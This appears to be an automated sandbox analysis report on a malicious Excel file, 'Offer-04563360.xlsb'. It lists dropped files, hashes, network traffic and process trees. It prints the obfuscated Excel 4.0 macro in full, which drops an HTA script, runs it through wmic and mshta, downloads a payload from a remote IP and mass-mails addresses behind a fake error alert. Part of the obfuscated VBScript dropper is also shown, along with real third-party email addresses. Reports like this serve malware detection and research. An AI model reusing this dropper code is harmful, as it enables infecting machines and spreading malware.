                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..O_c_R_a_D_s_p_y_q_F_z_A_w_c_y_G = "run" & Chr(100+1-1) & "" & "ll" & "32." & Chr(101+1-1) & Chr(120+1-1) & "" & "e " & "C:\" & Chr(92+1-1) & "Pro" & "gra" & Chr(109+1-1) & Chr(68+1-1) & "ata" & "\g" & Chr(118+1-1) & "ni" & "gg" & "er." & "bin" & Chr(32+1-1) & Chr(87+1-1) & "sp" & "Fre" & "eSt" & "ri" & "" & "" & "ng"..Set a_q_m_G_l_C_M_I_U_l_j_K_s_N_y_D_s = CreateObject("" & "MSX" & "ML" & "" & Chr(50+1-1) & ".Se" & "" & "rv" & Chr(101+1-1) & "rXM" & Chr(76+1-1) & "HTT" & "" & "" & "P." & Chr(54+1-1) & "" & ".0")....k_A_w_g_v_m_Q_G = "" & "Wsc" & "ri" & "pt" & ".S" & "hel" & "" & Chr(108+1-1) & ""..Set Y_Z_B_x_j_G_I_g_D_Q_N_Y_g_X_F_O = CreateObject(k_A_w_g_v_m_Q_G)..w_T_x_A_m_O_P_h_K_k = LCase(Y_Z_B_x_j_G_I_g_D_Q_N_Y_g_X_F_O.expandenvironme
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):128
                    Entropy (8bit):4.4073611589994215
                    Encrypted:false
                    SSDEEP:3:YEh2NZjMAsqy9zfx99+XePQDRp4+BKbe8QKIqDKp2QKLlTpyKzn:YEhodMAgz57+3DfFBme81DKp2fL+s
                    MD5:3DDF019B04083D7C7EEE4783BC82B32B
                    SHA1:9933674A8EC41DDE3B407C8CFB19082376144F19
                    SHA-256:6F72957748C8F23331545D8DDB5B3FA58152904E374B084CED3D296E7528DDB8
                    SHA-512:8B5D4DF18EF7798B8431F799E1F616B98163D8A73D169F654F43578C57DAD4F0E9CF500B5B321F7EC45FC9ADEF552B49B93B5B588D25918846E70D17E0E9D5F7
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A367EE7.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):37376
                    Entropy (8bit):7.968656906611756
                    Encrypted:false
                    SSDEEP:768:7PiRTH5k2UL/DIWy4Kwem6fZRnS3caTmDwhgorxK7bsdVcS4s:7PuALLImemeKHqeK7YncO
                    MD5:1016468D27038BE120F1F1460B89541B
                    SHA1:746395B724121D074EFBC262AB3B0C6A8449F081
                    SHA-256:DDEB10EDBCA4FB569F21DEF488C79B24002C37270D753501A2D35703BADA7DF4
                    SHA-512:0D2DB7EE55864B172F851529350D77B5FF81EAB85ED8C652DA823C6C9ABC3D82913BC52FF4BCEF36D1ECDD90A52A310A9BB8CD8201AD37EB6117E3841F63B980
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24CEB6FE.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 278 x 51, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2950
                    Entropy (8bit):7.8993383935684
                    Encrypted:false
                    SSDEEP:48:pdl8xfFpaj4hgHQd6xlWbrqtDhOjawI7rU/3e6U0N+mfNRimNwzie2/+dDl8o1XL:bILQxzWbrqt4jF8rU/3o0N+iTimmme28
                    MD5:162B885B4AA33B3E6B1DFDC5E55D12BC
                    SHA1:7AFCD5BDE19196181500267EE16EEA3F935462B2
                    SHA-256:F3002A1F5DC4EB3CC538F0D412601060642622D462E34ABDE2CFCC415886B2E5
                    SHA-512:53DD1948812484123DE7E4B58CA21362C4834784470447CF34D46207072CE2C6170747373E16748E2835ABA4B666E731C87739718BB3FCE0AAC09C091E7B7472
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR.......3......9.)...MIDATx..yTSW..Y....@X....B..h.w-Zm-...i..t.x.8.G;.qj....K..f...K.VK.q.U. P.DA.RC..d.?.y}%!.y...9.s........~........o|.(.....k.(..o..(.NP.Q(....P8A%D.p.J.B.......*!...TB..'..(.NP.Q(....P8A%D.p.J.B.......*!...TB..'..(.N..nq.....)...w..........f.......1.K.3C...]|...UY.......]....4-.@....^c.~w...?.@.g.]}k......o.4...\...|.p.e.s..F.$..fu......K..c..c....Z...J..\.......t.-.."E.....6.n.j%8ZM...s4.j..y....p..7.>|g.OBR.Yt.@g].W.g.{8Ngg..8@:mF.?...)ic./.H..>b.A..mmn*.......}V.........gI#4u..f...&....X}..W.......;b4.....d../n....<....E.O.lxY.<.../.I..Q..\...U...._ ....O..`.....6_(...F........bV$.N..f{fw.6..V...<A....y.....P*...."..+$,rN.........B....f.x...".......$&.=..4..j..eG..=<F?..@U..C...Te.......F%.p.%.`.!... ps.......K:.....Bw..........,..`OKS.......{.y.........H....xZ.6.<..5/(s.......g.......S^!a<.`../.\..h......5?4-.......x../..v...B.......zz..z4...8...........c.Y....n.8..T.."...EK-.....E...%.iT
                    C:\Users\user\AppData\Local\Temp\53F9.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):78351
                    Entropy (8bit):7.879030441592837
                    Encrypted:false
                    SSDEEP:1536:e7zFXeInKIdwEGeamaBt30SKZPuALLImemeKHqeK7Ync6rW1dEmH:e7zFPn/doehaj3980XKUYVrW1dHH
                    MD5:BA0491A55B33864803032FAD85791095
                    SHA1:6B7B54BF3D16DF552E720E41EC88E1449FBDA792
                    SHA-256:FEA78088764EF8A7FC83D53C80FB6A728CD0411087308E6B4892D38A83DA818D
                    SHA-512:DC40F55BD77FDDF51D5E5C9DBAFBD78FF4C233933FC87B61A2EBE02CEF0CDFAB12DF8BC0E12E2041FE00F1934F3B56350A504BD8CF10A403592568CE714B066C
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                    C:\Users\user\Desktop\~$Offer-04563360.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.85423685323248
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:Offer-04563360.xlsb
                    File size:77958
                    MD5:5b3a5c210da6c92ad1b28c057fb33808
                    SHA1:922822e5c237a2c3006b2caea28936d5d9382943
                    SHA256:69fe1bc03e4fc0a7c9ca0466cb3cc352c7446b27a4ddb466ba93aeae4fbac7df
                    SHA512:31e55629d403c3f92660e06e3470a1d0bf01c65299cad4df77b0b56a4889c9bb092aff837cf26044f49f5ec393a729d2a3dc654502463f53f18b69ad6b70a693
                    SSDEEP:1536:UWpPuALLImemeKHqeK7YncyUojd+8x4vgogK5R9YSKpfgdWIHmd:VI80XKUYMQd+8x4YofbyfgdWIHmd
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "Offer-04563360.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN("C:\Program" & CHAR(68) & "ata\r" & CHAR(67) & "Vu" & CHAR(121) & ".rt" & CHAR(102), 3)
                    1,564,=D9082+A2550
                    2,564,=A3096+A9582
                    3,564,=C9783+C2179
                    4,564,=B6438+B991
                    5,564,=D7717+D7525
                    6,564,=B7618+D3913
                    7,564,=D2283+A5996
                    8,564,=A4200+B6655
                    10,564,=A7769+D4208
                    12,564,=FOR.CELL("mpVUGcDFesvjAm",Sheet1!CK156:CK4873, TRUE)
                    14,564,=C2934+A8639
                    15,564,=A894+D2355
                    16,564,=A9966+B9088
                    18,564,=D921+D9175
                    21,564,=B52+D2453
                    22,564,=C729+D3605
                    24,564,=C8033+D5803
                    25,564,=FWRITE(0,CHAR(mpVUGcDFesvjAm))
                    27,564,=A8901+D6501
                    28,564,=B6409+D6362
                    29,564,=B7705+C7748
                    30,564,=D2230+A8245
                    33,564,=C4561+B6617
                    35,564,=B8317+A4072
                    36,564,=A7253+C1791
                    37,564,=C1090+D2122
                    38,564,=NEXT()
                    39,564,=A9569+A4208
                    42,564,=A2+C1566
                    46,564,=A931+A4803
                    48,564,=B5053+B6657
                    50,564,=B1626+A8015
                    52,564,=C4515+A8066
                    53,564,=EXEC("wmic" & CHAR(32) & CHAR(112) & "rocess " & CHAR(99) & "all create " & CHAR(34) & "mshta C:\ProgramDat" & CHAR(97) & "\rCVuy.rtf" & CHAR(34) & "")
                    54,564,=D8295+B2848
                    57,564,=C3793+A9010
                    59,564,=D5223+D2211
                    60,564,=A4777+C3525
                    61,564,=B4919+A6540
                    62,564,=D7823+A7515
                    64,564,=D2077+B8429
                    65,564,=B744+A805
                    66,564,=CALL("ur" & CHAR(108) & CHAR(109) & "" & CHAR(111) & CHAR(110) & "", "URLD" & CHAR(111) & CHAR(119) & "" & CHAR(110) & "loa" & CHAR(100) & "ToFile" & CHAR(65),CHAR(74) & "JCCJJ", 0, CHAR(104) & "ttp://" & CHAR(49) & "32.148." & CHAR(49) & CHAR(51) & CHAR(53) & ".183:8" & CHAR(48) & "80/" & CHAR(81) & "2W5VWU" & CHAR(70) & "L5VCMQ7JQP" & CHAR(69) & "TG3CC" & CHAR(84) & "YX72Z4" & CHAR(82) & "25" & CHAR(80) & "DG", "C:\ProgramDat" & CHAR(97) & "\AgMsUNfeoa" & CHAR(80) & "T.txt",0,0)
                    68,564,=B1010+B6784
                    69,564,=D655+B3280
                    72,564,=B2993+A5098
                    73,564,=B896+C6748
                    74,564,=C5684+C3601
                    78,564,=A3740+B9166
                    79,564,=ALERT("Err" & CHAR(111) & CHAR(114) & "! Se" & CHAR(110) & "ding r" & CHAR(101) & CHAR(112) & "or" & CHAR(116) & "" & CHAR(32) & "to Mi" & CHAR(99) & "ros" & CHAR(111) & "ft.." & CHAR(46))
                    81,564,=A3171+A7979
                    84,564,=D4977+C7229
                    85,564,=D2360+D5867
                    91,564,=C3857+A1301
                    92,564,=C1995+B8160
                    93,564,=FOPEN("C:" & CHAR(92) & CHAR(80) & "rog" & CHAR(114) & "amD" & CHAR(97) & "ta\Ag" & CHAR(77) & "sUNfeoaPT.tx" & CHAR(116) & "",1)
                    97,564,=A9199+C5546
                    99,564,=C2336+B27
                    100,564,=A2304+D20
                    103,564,=SEND.MAIL(EVALUATE(FREAD(US94,255)))
                    107,564,=A5943+C1177
                    110,564,=B8064+B5706
                    111,564,=A7705+A4591
                    112,564,=D1667+A1193
                    113,564,=B8485+C9974
                    114,564,=A8467+C5641
                    115,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2021 17:24:44.483208895 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 17:24:44.640537024 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 17:24:44.640707016 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 17:24:44.641439915 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 17:24:44.799077988 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 17:24:45.082377911 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 17:24:45.082562923 CET491678080192.168.2.22132.148.135.183
                    Nov 24, 2021 17:26:00.083129883 CET808049167132.148.135.183192.168.2.22
                    Nov 24, 2021 17:26:00.083239079 CET491678080192.168.2.22132.148.135.183

                    HTTP Request Dependency Graph

                    • 132.148.135.183:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167132.148.135.1838080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2021 17:24:44.641439915 CET0OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 132.148.135.183:8080
                    Connection: Keep-Alive
                    Nov 24, 2021 17:24:45.082377911 CET0INHTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 16:24:45 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 128
                    Data Raw: 7b 22 61 66 65 72 6e 61 6e 64 65 7a 40 63 61 70 65 6c 2d 76 69 6e 6f 73 2e 65 73 22 2c 22 73 68 65 72 40 73 6d 6c 63 6f 6e 73 75 6c 74 61 6e 74 73 2e 63 61 22 2c 22 63 6f 6c 69 6e 66 69 73 68 40 74 6d 73 2d 75 6b 2e 6e 65 74 22 2c 22 69 6e 66 6f 40 64 6f 6c 70 68 69 6e 2d 69 6e 6e 6f 76 61 74 69 6f 6e 73 2e 64 65 22 2c 22 73 68 61 72 6f 6e 40 76 69 73 61 73 6b 6b 2e 63 6f 6d 22 7d
                    Data Ascii: {"afernandez@capel-vinos.es","sher@smlconsultants.ca","colinfish@tms-uk.net","info@dolphin-innovations.de","sharon@visaskk.com"}


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:17:24:20
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f2d0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:17:24:43
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\rCVuy.rtf"
                    Imagebase:0xff020000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:17:24:44
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\rCVuy.rtf
                    Imagebase:0x13ff10000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >